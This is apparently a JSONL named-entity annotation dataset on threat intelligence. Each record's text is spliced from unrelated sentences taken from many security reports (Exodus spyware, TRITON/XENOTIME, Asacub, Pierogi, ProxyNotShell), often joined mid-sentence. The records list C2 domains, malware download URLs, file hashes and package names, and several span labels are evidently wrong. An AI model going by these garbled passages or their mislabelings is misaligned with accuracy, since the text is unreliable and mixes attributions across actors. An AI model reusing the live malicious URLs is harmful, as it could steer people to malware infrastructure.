{"text": "Interestingly , we found other DNS records mostly from 2017 that follow a similar pattern and appear to contain two-letters codes for districts in Italy : Server City server1bo.exodus.connexxa [ . Additionally , the actor possibly gained a foothold on other target networks\u2014beyond the two intrusions discussed in this post \u2013 using similar strategies . A shortcut is added to the the startup folder : C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup . Indicators of compromise IOCs are pieces of forensic data , such as data found in system log entries or files , that identify potentially malicious activity on a system or network .", "spans": [{"start": 167, "end": 196, "label": "Indicator"}, {"start": 478, "end": 507, "label": "Indicator"}, {"start": 512, "end": 535, "label": "Indicator"}, {"start": 546, "end": 578, "label": "Indicator"}, {"start": 582, "end": 657, "label": "Indicator"}]}
{"text": "] it Bologna server1bs.exodus.connexxa [ . There is often a singular focus from the security community on ICS malware largely due to its novel nature and the fact that there are very few examples found in the wild . Once the user logs on to the infected machine , the shortcut points to the file binary location in the C:\\ProgramData\\ folder . CrowdStrike Falcon will detect the OWASSRF exploit method described in this blog , and will block the method if the prevention setting for \u2022 None Monitor Exchange servers for signs of exploitation visible in IIS and Remote PowerShell logs using this script developed by CrowdStrike Services \u2022 None Consider application - level controls such as web application firewalls .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 84, "end": 102, "label": "Organization"}, {"start": 106, "end": 117, "label": "System"}, {"start": 344, "end": 362, "label": "System"}, {"start": 490, "end": 514, "label": "System"}, {"start": 519, "end": 582, "label": "Indicator"}, {"start": 614, "end": 634, "label": "Organization"}]}
{"text": "] it Brescia server1cs.exodus.connexxa [ . \u0426\u041d\u0418\u0418\u0425\u041c ) , a Russian government-owned technical research institution located in Moscow . The GUID generated by the malware is saved in a file called GUID.bin . If the main function is called with only , it will only perform its cleanup routine and immediately terminate .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 91, "end": 111, "label": "Organization"}, {"start": 136, "end": 140, "label": "System"}, {"start": 192, "end": 200, "label": "Indicator"}]}
{"text": "] it Cosenza server1ct.exodus.connexxa [ . In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute . This file is created in the same folder as the binary of the backdoor To learn more about how ThreatConnect can help you prepare for the potential of a ransomware attack , check out the ThreatConnect Platform .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 103, "end": 113, "label": "Organization"}, {"start": 149, "end": 155, "label": "System"}, {"start": 278, "end": 286, "label": "Malware"}, {"start": 311, "end": 324, "label": "System"}, {"start": 403, "end": 425, "label": "System"}]}
{"text": "] it Catania server1fermo.exodus.connexxa [ . Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates . ( C:\\ProgramData\\GUID.bin ) . They are specifically engaged in cyber crime to further their nations own interests .", "spans": [{"start": 13, "end": 45, "label": "Indicator"}]}
{"text": "] it server1fi.exodus.connexxa [ . TEMP.Veles' lateral movement activities used a publicly-available PowerShell-based tool , WMImplant . The backdoor has rather basic C2 functionality implemented through a predefined set of URLs : Who is the Winnti group ?", "spans": [{"start": 5, "end": 34, "label": "Indicator"}, {"start": 35, "end": 46, "label": "Organization"}, {"start": 101, "end": 122, "label": "System"}, {"start": 125, "end": 134, "label": "System"}, {"start": 141, "end": 149, "label": "Malware"}, {"start": 167, "end": 169, "label": "System"}, {"start": 242, "end": 254, "label": "Organization"}]}
{"text": "] it Firenze server1gioiat.exodus.connexxa [ . On multiple dates in 2017 , TEMP.Veles struggled to execute this utility on multiple victim systems , potentially due to AV detection . 1 . A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": [{"start": 13, "end": 46, "label": "Indicator"}, {"start": 75, "end": 85, "label": "Organization"}]}
{"text": "] it server1na.exodus.connexxa [ . Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software , retrofitted with code used for command and control . Sending machine information and a heartbeat to the C2 : The group has since earned infamy for being involved in malicious activities associated with targeted attacks , such as deploying spear - phishing campaigns and building a backdoor .", "spans": [{"start": 5, "end": 34, "label": "Indicator"}, {"start": 63, "end": 73, "label": "Organization"}, {"start": 105, "end": 113, "label": "Organization"}, {"start": 289, "end": 291, "label": "System"}, {"start": 414, "end": 474, "label": "Organization"}]}
{"text": "] it Napoli server1rc.exodus.connexxa [ . We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target 's network . URL : http://nicoledotson.icu/debby/weatherford/Yortysnr The information sent to the C2 includes : One of the most common techniques used by Cuba actors exploited known vulnerabilities .", "spans": [{"start": 12, "end": 41, "label": "Indicator"}, {"start": 100, "end": 110, "label": "Organization"}, {"start": 174, "end": 224, "label": "Indicator"}, {"start": 253, "end": 255, "label": "System"}, {"start": 309, "end": 320, "label": "Organization"}, {"start": 331, "end": 352, "label": "Vulnerability"}]}
{"text": "] it Reggio Calabria server2ct.exodus.connexxa [ . Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow , lending some further support to the scenario that CNIIHM , a Russian research organization in Moscow , has been involved in TEMP.Veles activity . cname : Combating malware , ransomware , and malicious cyber attacks has always relied on information sharing , exposure of actors TTPs and the dissemination of reliable threat intelligence so that security professionals can quickly develop mitigations , remediations , and update their defenses to block future attacks .", "spans": [{"start": 21, "end": 50, "label": "Indicator"}, {"start": 102, "end": 112, "label": "Organization"}, {"start": 195, "end": 201, "label": "Organization"}, {"start": 214, "end": 235, "label": "Organization"}, {"start": 269, "end": 279, "label": "Organization"}]}
{"text": "] it Catania server2cz.exodus.connexxa [ . XENOTIME is easily the most dangerous threat activity publicly known . computer name , username , and GUID . av : Name of detected antivirus . osversion : version of the operating system . aname : the location of the malware on the infected machine . Initially , the group claimed DDoS attacks against entities located in Western countries , seemingly prioritizing Sweden , the Netherlands , and Denmark .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 43, "end": 51, "label": "Organization"}, {"start": 145, "end": 149, "label": "System"}, {"start": 324, "end": 336, "label": "Organization"}]}
{"text": "] it Catanzaro server2fi.exodus.connexxa [ . CNIIHM 's characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity . Requesting commands from the C2 server : They have used phishing emails containing inline links to malicious URLs hosting DOUBLEDRAG malware , a highly obfuscated Javascript downloader .", "spans": [{"start": 15, "end": 44, "label": "Indicator"}, {"start": 45, "end": 51, "label": "Organization"}, {"start": 147, "end": 157, "label": "Organization"}, {"start": 198, "end": 200, "label": "System"}, {"start": 220, "end": 290, "label": "Organization"}, {"start": 291, "end": 309, "label": "Malware"}, {"start": 312, "end": 353, "label": "Malware"}]}
{"text": "] it Firenze server2mi.exodus.connexxa [ . Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks . URL : http://nicoledotson.icu/debby/weatherford/Ekspertyza . Once they successfully breached a network , MuddyWater attempted to steal credentials and move laterally .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 43, "end": 49, "label": "Organization"}, {"start": 84, "end": 113, "label": "System"}, {"start": 150, "end": 158, "label": "Organization"}, {"start": 269, "end": 281, "label": "System"}, {"start": 290, "end": 342, "label": "Indicator"}, {"start": 389, "end": 399, "label": "Organization"}]}
{"text": "] it Milano server2rc.exodus.connexxa [ . XENOTIME rose to prominence in December 2017 when Dragos and FireEye jointly published details of TRISIS destructive malware targeting Schneider Electric 's Triconex safety instrumented system . Ekspertyza means expertise or examination in Ukranian . Based on evidence of lateral movement , the attacker potentially had access to the SCADA system for up to three months .", "spans": [{"start": 12, "end": 41, "label": "Indicator"}, {"start": 42, "end": 50, "label": "Organization"}, {"start": 92, "end": 98, "label": "Organization"}, {"start": 103, "end": 110, "label": "Organization"}, {"start": 140, "end": 146, "label": "System"}, {"start": 337, "end": 345, "label": "Organization"}, {"start": 376, "end": 388, "label": "System"}]}
{"text": "] it Reggio Calabria server3bo.exodus.connexxa [ . Targeting a safety system indicates significant damage and loss of human life were either intentional or acceptable goals of the attack , a consequence not seen in previous disruptive attacks such as the 2016 CRASHOVERRIDE malware that caused a power loss in Ukraine . There are 3 basic commands coming from the server in the form of MD5 hashes : Masquerading the attacks as ransomware provides the threat actors with plausible deniability , which allows the nationstate to send a message without taking direct blame .", "spans": [{"start": 21, "end": 50, "label": "Indicator"}, {"start": 260, "end": 281, "label": "System"}, {"start": 450, "end": 463, "label": "Organization"}]}
{"text": "] it Bologna server3ct.exodus.connexxa [ . XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts . Dfff0a7fa1a55c8c1a4966c19f6da452 : cmd . 51a7a76a7dd5d9e4651fe3d4c74d16d6 : downloadfile . 62c92ba585f74ecdbef4c4498a438984 : screenshot . First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 43, "end": 51, "label": "Organization"}, {"start": 57, "end": 86, "label": "System"}, {"start": 169, "end": 175, "label": "System"}, {"start": 233, "end": 265, "label": "Indicator"}, {"start": 274, "end": 306, "label": "Indicator"}, {"start": 324, "end": 356, "label": "Indicator"}, {"start": 401, "end": 411, "label": "Malware"}]}
{"text": "] it Catania server3.exodus.connexxa [ . XENOTIME configured TRISIS based on the specifics and functions of the Triconex system within the industrial control ( ICS ) environment . Uploading data ( mainly screenshots ) to the C2 : The leaked tooling included a Python script , , that when executed led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks .", "spans": [{"start": 13, "end": 40, "label": "Indicator"}, {"start": 41, "end": 49, "label": "Organization"}, {"start": 61, "end": 67, "label": "System"}, {"start": 160, "end": 163, "label": "System"}, {"start": 225, "end": 227, "label": "System"}, {"start": 234, "end": 296, "label": "Vulnerability"}]}
{"text": "] it server3fi.exodus.connexxa [ . Dragos' data indicates XENOTIME remains active . URL : http://nicoledotson.icu/debby/weatherford/Zavantazhyty . Sandworm \u2019s substation attack reveals notable insights into Russia \u2019s continued investment in OT - oriented offensive cyber capabilities and overall approach to attacking OT systems .", "spans": [{"start": 5, "end": 34, "label": "Indicator"}, {"start": 35, "end": 42, "label": "Organization"}, {"start": 58, "end": 66, "label": "Organization"}, {"start": 90, "end": 144, "label": "Indicator"}, {"start": 147, "end": 176, "label": "Organization"}, {"start": 318, "end": 328, "label": "System"}]}
{"text": "] it Firenze server4fi.exodus.connexxa [ . TEMP.Veles created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly . Zavantazhyty means to load or download in Ukranian . For Snort coverage that can detect the exploitation of these vulnerabilities , download the latest rule sets from Snort.org , and our latest Vulnerability Advisories are always posted on Talos Intelligence \u2019s website .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 43, "end": 53, "label": "Organization"}, {"start": 64, "end": 78, "label": "System"}, {"start": 93, "end": 130, "label": "System"}, {"start": 270, "end": 275, "label": "Organization"}]}
{"text": "] it Firenze serverrt.exodus.connexxa [ . Furthermore , Dragos' analysis of the TRISIS event continues as we recover additional data surrounding the incident . This command is used to upload collected data to the C2 server . By creating awareness and using the right solutions , both individuals and organizations can take the steps needed to defend against the malicious tactics used by threat actors like the Winnti group .", "spans": [{"start": 13, "end": 41, "label": "Indicator"}, {"start": 56, "end": 63, "label": "Organization"}, {"start": 80, "end": 86, "label": "System"}, {"start": 213, "end": 215, "label": "System"}, {"start": 411, "end": 423, "label": "Organization"}]}
{"text": "] it Public Resume Confirms Development of Android Agent Additionally , an employee of eSurv quite precisely described their work in developing an \" agent to gather data from Android devices and send it to a C & C server '' as well as researching \" vulnerabilities in mobile devices ( mainly Android ) '' in a publicly available resume . XENOTIME operates globally , impacting regions far outside of the Middle East , their initial target . For example , in some instances the backdoor uploads screenshots taken from an infected machine , as can be seen in the example below . RA Group , in its ongoing campaigns , has targeted the U.S. , South Korea , Taiwan , the U.K. and India across several business verticals , including manufacturing , wealth management , insurance providers , pharmaceuticals and financial management consulting companies .", "spans": [{"start": 43, "end": 50, "label": "System"}, {"start": 87, "end": 92, "label": "Organization"}, {"start": 175, "end": 182, "label": "System"}, {"start": 292, "end": 299, "label": "System"}, {"start": 338, "end": 346, "label": "Organization"}, {"start": 477, "end": 485, "label": "Malware"}, {"start": 577, "end": 585, "label": "Organization"}, {"start": 628, "end": 636, "label": "Organization"}, {"start": 639, "end": 650, "label": "Organization"}, {"start": 653, "end": 659, "label": "Organization"}, {"start": 666, "end": 670, "label": "Organization"}, {"start": 675, "end": 680, "label": "Organization"}, {"start": 696, "end": 714, "label": "Vulnerability"}, {"start": 727, "end": 740, "label": "Vulnerability"}, {"start": 743, "end": 760, "label": "Vulnerability"}, {"start": 763, "end": 782, "label": "Vulnerability"}, {"start": 785, "end": 846, "label": "Vulnerability"}]}
{"text": "Further details in it reflect characteristics of Exodus ( such as the bypass of power managers we described from Exodus One , and more ) : Indicators of Compromise Exodus One 011b6bcebd543d4eb227e840f04e188fb01f2335b0b81684b60e6b45388d3820 0f5f1409b1ebbee4aa837d20479732e11399d37f05b47b5359dc53a4001314e5 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f Intelligence suggests the group has been active since at least 2014 and is presently operating in multiple facilities targeting safety systems beyond Triconex . Removing information : Through it all , our 2023 State of Ransomware equips your organization with the knowledge to counter the hidden mechanics of global ransomware .", "spans": [{"start": 49, "end": 55, "label": "Malware"}, {"start": 113, "end": 123, "label": "Malware"}, {"start": 164, "end": 174, "label": "Malware"}, {"start": 175, "end": 239, "label": "Indicator"}, {"start": 240, "end": 304, "label": "Indicator"}, {"start": 305, "end": 369, "label": "Indicator"}]}
{"text": "26fef238028ee4b5b8da631c77bfb44ada3d5db8129c45dea5df6a51c9ea5f55 33a9da16d096426c82f150e39fc4f9172677885cfeaedcff10c86414e88be802 34d000ee1e36efd10eb37e2b79d69249d5a85682a61390a89a1b9391c46bf2ba 4f6146956b50ae3a6e80a1c1f771dba848ba677064eb0e166df5804ac2766898 Dragos instead focuses on threat behaviors and appropriate detection and response . URL : http://nicoledotso.icu/debby/weatherford/Vydalyty . They can target a single company , maybe with the intention of stealing trade secrets or discrediting that company .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 260, "end": 266, "label": "Organization"}, {"start": 350, "end": 399, "label": "Indicator"}, {"start": 420, "end": 434, "label": "Organization"}]}
{"text": "5db49122d866967295874ab2c1ce23a7cde50212ff044bbea1da9b49bb9bc149 70e2eea5609c6954c61f2e5e0a3aea832d0643df93d18d7d78b6f9444dcceef0 80810a8ec9624f317f832ac2e212dba033212258285344661e5da11b0d9f0b62 8453ce501fee1ca8a321f16b09969c517f92a24b058ac5b54549eabd58bf1884 Dragos assesses with moderate confidence that XENOTIME intends to establish required access and capability to cause a potential , future disruptive\u2014or even destructive\u2014event . Vydalyty means to remove or delete in Ukrainian . \u2022 None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 260, "end": 266, "label": "Organization"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 507, "end": 523, "label": "Vulnerability"}, {"start": 528, "end": 544, "label": "Vulnerability"}]}
{"text": "a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f db59407f72666526fca23d31e3b4c5df86f25eff178e17221219216c6975c63f e0acbb0d7e55fb67e550a6bf5cf5c499a9960eaf5f037b785f9004585202593b Exodus One Package Names com.phonecarrier.linecheck However , full details on XENOTIME and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView . The malware can delete various requests based on the command below . Cisco Secure Web Appliance ( formerly Web Security Appliance ) automatically blocks potentially dangerous sites and tests suspicious sites before users access them .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 205, "label": "Malware"}, {"start": 220, "end": 246, "label": "Indicator"}, {"start": 273, "end": 281, "label": "Organization"}, {"start": 389, "end": 405, "label": "Organization"}, {"start": 477, "end": 503, "label": "System"}, {"start": 515, "end": 537, "label": "System"}]}
{"text": "rm.rf operatore.italia it.offertetelefonicheperte it.servizipremium assistenza.sim assistenza.linea.riattiva assistenza.linea it.promofferte Exodus Two 64c11fdb317d6b7c9930e639f55863df592f23f3c7c861ddd97048891a90c64b a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e Exodus Two This seems confusing as FireEye earlier publicly declared the TRITON as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" . The records of the domains and IPs involved in this campaign seem to show that the attackers created a new infrastructure specifically for this campaign . Reconstruction of the host \u2019s anti - virus logs indicates \u201c lun.vbs \u201d and \u201c n.bat \u201d were executed in close time proximity .", "spans": [{"start": 6, "end": 49, "label": "Indicator"}, {"start": 50, "end": 67, "label": "Indicator"}, {"start": 68, "end": 82, "label": "Indicator"}, {"start": 83, "end": 108, "label": "Indicator"}, {"start": 109, "end": 125, "label": "Indicator"}, {"start": 126, "end": 140, "label": "Indicator"}, {"start": 141, "end": 151, "label": "Malware"}, {"start": 152, "end": 216, "label": "Indicator"}, {"start": 217, "end": 281, "label": "Indicator"}, {"start": 282, "end": 292, "label": "Malware"}, {"start": 317, "end": 324, "label": "Organization"}, {"start": 355, "end": 361, "label": "System"}, {"start": 405, "end": 425, "label": "Organization"}, {"start": 451, "end": 461, "label": "Organization"}, {"start": 679, "end": 744, "label": "Indicator"}]}
{"text": "ELF Utilities 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 This seems confusing as FireEye earlier publicly declared the \" TRITON actor \" as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" . The domains were registered in November 2019 and operationalized shortly after . To prevent ProxyNotShell exploitation on older Microsoft Exchange servers , Microsoft released a blog4 advocating for a custom inside the Microsoft IIS server supporting Exchange .", "spans": [{"start": 14, "end": 78, "label": "Indicator"}, {"start": 79, "end": 143, "label": "Indicator"}, {"start": 144, "end": 208, "label": "Indicator"}, {"start": 209, "end": 273, "label": "Indicator"}, {"start": 298, "end": 305, "label": "Organization"}, {"start": 338, "end": 344, "label": "System"}, {"start": 396, "end": 416, "label": "Organization"}, {"start": 442, "end": 452, "label": "Organization"}, {"start": 585, "end": 611, "label": "System"}, {"start": 614, "end": 623, "label": "Organization"}]}
{"text": "3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a Meanwhile , parallel work at Dragos ( my employer , where I have performed significant work on the activity described above ) uncovered similar conclusions concerning TTPs and behaviors , for both the 2017 event and subsequent activity in other industrial sectors . In part two of this research , we examined the Pierogi B-ACT S-MAL campaign . The Loader usage is to perform a lot of Antidebug , AntiVM and Antiemulation checks to make it harder for automated analysis and inject the core module .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 289, "end": 295, "label": "Organization"}, {"start": 505, "end": 523, "label": "Organization"}, {"start": 608, "end": 614, "label": "System"}, {"start": 644, "end": 653, "label": "System"}, {"start": 656, "end": 662, "label": "System"}, {"start": 667, "end": 680, "label": "System"}]}
{"text": "b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \" TRITON actor \" when preparing to deploy the TRITON/TRISIS malware framework in 2017 . Cybereason suspects this These ransom demands are significantly lower than those made by many well - known ransomware gangs like RYUK , Babuk , REvil , Conti , DarkSide , BlackMatter , BlackCat , and Yanluowang , which are typically in the millions of dollars .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 260, "end": 267, "label": "Organization"}, {"start": 364, "end": 370, "label": "System"}, {"start": 408, "end": 429, "label": "System"}, {"start": 450, "end": 460, "label": "Organization"}, {"start": 579, "end": 583, "label": "Malware"}, {"start": 586, "end": 591, "label": "Malware"}, {"start": 594, "end": 599, "label": "Malware"}, {"start": 602, "end": 607, "label": "Malware"}, {"start": 610, "end": 618, "label": "Malware"}, {"start": 621, "end": 632, "label": "Malware"}, {"start": 635, "end": 643, "label": "Malware"}, {"start": 650, "end": 660, "label": "Malware"}]}
{"text": "Command & Controls ad1.fbsba [ . Based on information gained from discussion with the initial TRITON/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye 's analysis published in April 2019 , described in various media . campaign targets Palestinian individuals and entities in the Middle East , specifically directed at We searched for the unique string and identified a single match to a cyber range ( aka polygon ) developed by Rostelecom - Solar , a Russian cyber security company that received a government in 2019 to begin training cyber security experts and conducting electric power disruption and emergency response exercises .", "spans": [{"start": 19, "end": 32, "label": "Indicator"}, {"start": 94, "end": 107, "label": "System"}, {"start": 178, "end": 184, "label": "Organization"}, {"start": 269, "end": 276, "label": "Organization"}, {"start": 336, "end": 341, "label": "Organization"}, {"start": 513, "end": 524, "label": "Organization"}, {"start": 527, "end": 538, "label": "Organization"}, {"start": 554, "end": 572, "label": "Organization"}, {"start": 577, "end": 607, "label": "Organization"}]}
{"text": "] com ws.my-local-weather [ . Since late 2018 , based upon the most-recent posting , FireEye appears to have \" walked back \" the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \" TRITON actor \" , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME . those in the Palestinian government . If an adversary can send an unauthorized command message to a control system , then it can instruct the control systems device to perform an action outside the normal bounds of the device 's actions .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 85, "end": 92, "label": "Organization"}, {"start": 160, "end": 170, "label": "Organization"}, {"start": 218, "end": 224, "label": "System"}, {"start": 241, "end": 247, "label": "Organization"}, {"start": 324, "end": 332, "label": "Organization"}, {"start": 348, "end": 370, "label": "Organization"}, {"start": 373, "end": 571, "label": "Vulnerability"}]}
{"text": "] com 54.71.249 [ . Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME . The threat actors behind the campaign use social engineering to infect their victims with the Pierogi backdoor for cyber espionage purposes . Two days following the OT activity , Sandworm deployed a new variant of CADDYWIPER throughout the IT environment .", "spans": [{"start": 6, "end": 19, "label": "Indicator"}, {"start": 20, "end": 26, "label": "Organization"}, {"start": 103, "end": 111, "label": "Organization"}, {"start": 208, "end": 224, "label": "Malware"}, {"start": 293, "end": 301, "label": "Organization"}, {"start": 328, "end": 338, "label": "System"}, {"start": 354, "end": 368, "label": "System"}]}
{"text": "] 137 54.69.156 [ . Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos' approaches with respect to the \" TRITON actor \" comes down to fundamental philosophical differences in methodology . The threat actor behind the attack invested considerable time and effort to lure their victims with specially-crafted documents that target Palestinian individuals and entities in the Middle East . None Enablement and usage of SQL extended stored procedures for Windows shell command execution : PIEHOP ( filename : r3_iec104_control.exe ) ( MD5 : cd8f394652db3d0376ba24a990403d20 ) is a disruption tool written in Python and packaged with PyInstaller version 2.1 + that has the capability to connect to a user supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": [{"start": 6, "end": 19, "label": "Indicator"}, {"start": 261, "end": 268, "label": "Organization"}, {"start": 273, "end": 280, "label": "Organization"}, {"start": 314, "end": 320, "label": "System"}, {"start": 601, "end": 691, "label": "Indicator"}, {"start": 694, "end": 700, "label": "System"}, {"start": 703, "end": 735, "label": "Indicator"}, {"start": 740, "end": 778, "label": "Indicator"}, {"start": 781, "end": 994, "label": "Malware"}]}
{"text": "] 31 162.243.172 [ . In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON . In our analysis , we reviewed the TTPs and the decoy content , and pointed out the similarities between previous attacks that have been attributed to MoleRATs , an Arabic-speaking , politically motivated group that has operated The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname \u201c PIG GOD\u201d\u2014another", "spans": [{"start": 5, "end": 20, "label": "Indicator"}, {"start": 59, "end": 69, "label": "Organization"}, {"start": 72, "end": 79, "label": "Organization"}, {"start": 148, "end": 158, "label": "Organization"}, {"start": 181, "end": 187, "label": "System"}, {"start": 340, "end": 348, "label": "Organization"}, {"start": 436, "end": 449, "label": "Indicator"}, {"start": 518, "end": 536, "label": "Organization"}]}
{"text": "] 208 attiva.exodus.esurv [ . My understanding is FireEye labels entities where definitive attribution is not yet possible with the \" TEMP \" moniker ( hence , TEMP.Veles ) \u2013 yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting . in the Middle East since 2012 . But on Mar. 5 , 2014 , Harrison committed suicide by shooting himself in the head with a handgun .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 50, "end": 57, "label": "Organization"}, {"start": 159, "end": 169, "label": "Organization"}, {"start": 191, "end": 198, "label": "Organization"}, {"start": 350, "end": 358, "label": "Organization"}]}
{"text": "] it The rise of mobile banker Asacub 28 AUG 2018 We encountered the Trojan-Banker.AndroidOS.Asacub family for the first time in 2015 , when the first versions of the malware were detected , analyzed , and found to be more adept at spying than stealing funds . In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) . The Pierogi backdoor discovered by Cybereason during this investigation seems to be undocumented and gives the threat actors espionage capabilities over their victims . Indicators of Compromise vs. Indicators of Attack", "spans": [{"start": 31, "end": 37, "label": "Malware"}, {"start": 69, "end": 99, "label": "Malware"}, {"start": 277, "end": 285, "label": "Organization"}, {"start": 430, "end": 451, "label": "Organization"}, {"start": 624, "end": 640, "label": "Malware"}, {"start": 655, "end": 665, "label": "Organization"}, {"start": 789, "end": 813, "label": "Indicator"}]}
{"text": "The Trojan has evolved since then , aided by a large-scale distribution campaign by its creators ( in spring-summer 2017 ) , helping Asacub to claim top spots in last year \u2019 s ranking by number of attacks among mobile banking Trojans , outperforming other families such as Svpeng and Faketoken . Of note , this methodology of naming abstracts away the \" who \" element \u2013 XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events . Based on the Ukranian language embedded in the backdoor , Cybereason raises the possibility that the backdoor was obtained in underground communities by the threat actors , rather than developed in-house by the group . The trojan acted like a legitimate application or file in order to trick users into running it .", "spans": [{"start": 133, "end": 139, "label": "Malware"}, {"start": 273, "end": 279, "label": "Malware"}, {"start": 284, "end": 293, "label": "Malware"}, {"start": 370, "end": 378, "label": "Organization"}, {"start": 438, "end": 458, "label": "Organization"}, {"start": 618, "end": 626, "label": "Malware"}, {"start": 629, "end": 639, "label": "Organization"}, {"start": 672, "end": 680, "label": "Malware"}, {"start": 790, "end": 800, "label": "Malware"}]}
{"text": "We decided to take a peek under the hood of a modern member of the Asacub family . Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to \" the TRITON actor \" ) describe the same phenomena , yet at the same time appear different . Outlaw Updates Kit to Kill Older Miner Versions , Targets More Systems . PIEHOP utilizes LIGHTWORK to execute the IEC-104 commands \" ON \u201d or \" OFF \" on the remote system and immediately deletes the executable after issuing the commands .", "spans": [{"start": 67, "end": 73, "label": "Malware"}, {"start": 196, "end": 204, "label": "Organization"}, {"start": 209, "end": 219, "label": "Organization"}, {"start": 257, "end": 263, "label": "System"}, {"start": 344, "end": 350, "label": "Organization"}, {"start": 417, "end": 423, "label": "System"}, {"start": 433, "end": 442, "label": "System"}]}
